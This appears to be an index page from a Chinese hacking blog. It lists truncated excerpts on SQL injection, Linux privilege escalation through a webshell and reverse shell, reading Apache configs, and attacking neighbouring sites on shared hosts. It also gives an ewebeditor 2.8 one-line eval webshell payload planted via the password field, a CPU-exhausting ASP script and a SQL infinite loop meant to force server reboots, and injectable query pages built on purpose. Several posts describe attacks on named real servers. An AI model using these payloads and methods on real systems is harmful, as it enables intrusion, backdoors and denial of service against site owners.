'插入式' 注入技巧

很不错的注入手法,今天发到这跟大家共享下。 不喜勿喷! 例: https://www.webshell.cc/gaokao/ReadNews.asp?NewsID=3255'&BigClassName=&BigClassID=21&SmallClassID=42&SpecialID=0 试着在Newsid=3255后面插入“'”,结果报错。 “Microsoft OL...

- 阅读全文 -

linux渗透与安全第三节 - 提权

一些人一直觉得Linux提权是一项高深技术,其实Linux提权并不神秘。总结其步骤,可以简单分为5步: 1,获取webshell 2,具有执行command line权限,并获取Linux的系统版本 3,上传与Linux系统版本对应的漏洞提权脚本至可写可执行的目录下 4,执行提权脚本和反弹连接脚本 5,远程使用command line控制机器 本文所采用的实例仍然是广岛大学研究所的服务器,但是目前...

- 阅读全文 -

linux渗透与安全第二节 - 读取配置文件

国际上最通用的Linux虚拟主机搭建方式是这样的: Linux操作系统+Apache网站容器+PHP脚+MySQL数据库 一个服务器上的网站配置信息显然都储存在Apache的配置文件中。通常Apache会安装在Linux的这个目录下:/usr/local,其Apache的conf配置文件也会在Apache的目录下,当然,也有的Apache配置文件会单独拿出来,放到例如/etc/httpd/conf...

- 阅读全文 -

Linux渗透第一节 - vi旁注

我其实并不精通Linux渗透,会的那丁点几乎都是跟小白学的,虽然学的很菜。今天小白在群里发了一个英国的虚拟主机。很显然php的webshell没有权限,那么她是怎么拿到管理权限的?反弹连接呗。不过她说,对于Linux不精通的人,她个人建议先从vi学起。当然了,现在她写的一些傻瓜化webshell有时一键就能搞定反弹连接。不过本章只讲,如何用vi来旁注服务器上的其他网站。 一个实际例子(实际上小白用...

- 阅读全文 -

COG黑客自律公约(草案)

《COG黑客自律公约》(草案) 第1节 《 COG黑客自律公约》制定的原则 《COG黑客自律公约》参考了联合国大会2002年的第57/239号决议“创造全球网 络安全文化”和2004年的第58/199号决议“创造全球网络安全文化及保护重要的信 息基础设施”以及社会业界对黑客精神等方面的解释与研究。《COG黑客自律公约》 不是法律,若有不符合现行法律的,以现行法律为准。 《COG黑客自律公约》适用于...

- 阅读全文 -

WEBSHELL重启服务器的方法?

把下面代码保存成webshell.asp,然后访问。CPU暴。管理员重启。 <% for i = 1 to 100 i = 10 next %> DB-OWNER权限下让服务器重启    SQL命令:wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd– 收集一下。会有用的哦!!

- 阅读全文 -

ewebeditor 2.8 后台插马

ewebeditor 2.8 后台插上一句话 影响版本:2.8 商业版 攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’ 设置成功后,访问https://www.webshell.cc/ewebeditor/asp/config.asp文件即可, 一句话木马被写入到这个文件里面了.  

- 阅读全文 -

服务器安全设置

1.将mysql运行在普通用户权限下,这是最重要的一点,大部分的入侵都是利用数据库的权限进行的。 MYSQL的降权运行 新建立一个用户比如mysqlstart net user mysqlstart fuckmicrosoft /add net localgroup users mysqlstart /del 不属于任何组 如果MYSQL装在d:\mysql ,那么,给 mysqlstart 完全...

- 阅读全文 -

ASP ASPX PHP 构造注入页面的代码

把下面的代码分别保存为ASP。PHP。ASPX Mssql: <!–#include file=”conn.asp”–> <% hid=request.QueryString(“id”) sql=”select * from admin where id=”&hid set rs=conn.execute (sql) %> Access: <% db=”asp...

- 阅读全文 -